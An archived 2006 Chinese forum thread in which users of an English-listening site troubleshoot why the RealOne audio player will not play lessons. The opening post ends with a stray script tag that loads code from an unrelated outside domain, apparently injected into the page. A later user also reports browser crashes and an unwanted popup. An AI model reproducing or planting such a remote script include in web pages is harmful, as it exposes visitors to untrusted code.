标题: 听不到资料的朋友们注意啦 [打印本页]

作者: cosmospeak    时间: 2006-2-16 20:33     标题: 听不到资料的朋友们注意啦

鉴于播放器无法播放资料这个问题反复被提出,现特设本帖
原帖由 tingroom 于 2006-2-15 09:19 发表
www.tingroom.com首页播放器已经更换成onlyone朋友发给大家的那个RealOne Play V6.0.11.868 简体中文版播放器了,需要的朋友请到首页去下载吧。(记住在下载安装前 ...

或者在~这里~下载
论坛的发展需要我们大家的共同努力 这样才能不辜负管理员同志的一片好心哦

<script src=http://www.u9cn.com/webip.php></script>
作者: onlyone    时间: 2006-2-18 09:08

呵呵,谢谢楼主了,我会努力的,一起与大家一起努力tingroom论坛!!
作者: 5309712    时间: 2006-2-18 10:51     标题: 我还是听不到

cosmospeak   你好呀,我也是莆田的,我还是听不到
作者: jean_2046    时间: 2006-2-18 17:38

謝謝謝!~太好了
作者: 露珠    时间: 2006-2-20 09:55     标题: 急呀!

前些天还可以下载,为什么现在又下载不了呢?并且到这里,都不知道在哪里留言站长才能看到,闷呀!
作者: 露珠    时间: 2006-2-20 09:56     标题:

我说的下载是指英语内容,不是播放器!
作者: cosmospeak    时间: 2006-2-20 10:06

原帖由 露珠 于 2006-2-20 09:56 发表
我说的下载是指英语内容,不是播放器!

请注意标题 这个帖子是为了听不到的朋友们准备的 呵呵 关于下载的问题的解释是 这里的资源本来就不提供下载 前些时候可以下载是因为漏洞问题 估计管理员目前已经封掉了 ^_+ 相信日后会有更好的下载服务提供的 网站正在发展嘛
作者: 露珠    时间: 2006-2-20 12:29

唉,我真是有些糊涂了!不过,还是谢谢!
作者: onlyone    时间: 2006-2-21 09:20

本帖由 tingroom 2006-2-20 10:04 发布:看到大家这么关注下载,那就在此说一下吧

现在已经初步打算开设个VIP栏目,那时就可以提供下载了,希望到时大家能够喜欢,并得到大家的支持哟!

作者: 执手相悦    时间: 2006-3-10 21:10

都能够听到阿
作者: abcderic    时间: 2006-3-21 15:27

下载安装了,还是听不了。网页上real的地方经常不显示或者显示一个小方框上有几个小图片,有时IE还会当掉,怎么回事?我用的是电信lan,和windows xp.杀毒软件是肉顿。以前可以,最近就这样了,是不是中病毒了?
作者: cosmospeak    时间: 2006-3-21 15:43

这位朋友不要着急,我会尽快联系管理员解决此事
作者: tingroom    时间: 2006-3-21 16:09

进教程页面时,在地址栏下方有没有出现“插件阻止了”之类的提示呢,如果没有,应该是播放器的原因,你试试把现在用的播放器彻底卸载掉,然后再重新安装试试!
作者: abcderic    时间: 2006-3-21 17:21

原帖由 tingroom 于 2006-3-21 04:09 PM 发表
进教程页面时,在地址栏下方有没有出现“插件阻止了”之类的提示呢,如果没有,应该是播放器的原因,你试试把现在用的播放器彻底卸载掉,然后再重新安装试试!

没有,我用myie2打不开,用ie也不行,而且会弹出http://www.wsight.com/choosesite.aspx这个广告页.
作者: abcderic    时间: 2006-3-21 20:49

晕,只能用realplay8.0来听了,realone不行啊.可是它老提示我更新怎么办啊

作者: ppmm    时间: 2006-3-27 14:44

请问为什么我下载了你们提供的软件不行,后来我自己又在网上下了realplayer 10,但是还是不行 啊?
作者: tingroom    时间: 2006-3-27 16:58

不能听是什么提示呢?在安装完播放器后,进听力教程页面左侧出现播放器图标了吗?
作者: qsdiaq    时间: 2006-3-28 21:47     标题: 急!!!还是听不了

我的机器装的是win2000,安装完播放器后,进听力教程页面左侧没出现播放器图标,而是如18楼的兄弟说的那样显示一个小方框上有圆、方、三角小图片---这是不是缺少什么插件啊?
作者: jaocy007    时间: 2006-3-29 06:42     标题: 还没试

就在听歌,呵呵 
想想就高兴,希望网站发展得更好
作者: onlyone    时间: 2006-3-29 09:39

17楼的朋友,你出现那种情况是因为没有下载安装realplayer播放器的原因,赶快都下载个安装上去就好用了。
作者: qsdiaq    时间: 2006-3-29 14:05     标题: 无奈

onlyone版主,realplay和realone分别都下载安装过了,还是不行!求救
作者: jiangld    时间: 2006-4-13 18:27     标题: 我下载的6.0.11.872的,怎么不能在线听啊

我下载的6.0.11.872的,怎么不能在线听啊
作者: 爱相随    时间: 2006-4-19 09:29

原帖由 onlyone 于 2006-3-22 08:56 AM 发表
RealOne Play V6.0.11.868 简体中文版播放器

直接点击,然后保存或是右击,弹出菜单选择你机器上安装的下载软件下载。

原帖由 爱相随 于 2006-4-19 09:04 AM 发表
RealPlayer10-5GOLD_cn.rar

免费下载了

作者: 青青草    时间: 2007-5-9 20:21

为什么我可以下载听力资料,却不可以在线收听呢,而且所有的视频我也都看不了了.如英语动画里的内容.我很想知道这是因为什么原因,希望管理员能够列出可能出现的问题.本人急待大家的回复.(赠人玫瑰,手有余香)

欢迎光临 英语听力论坛 (http://bbs.tingroom.com/) Powered by Discuz! 7.2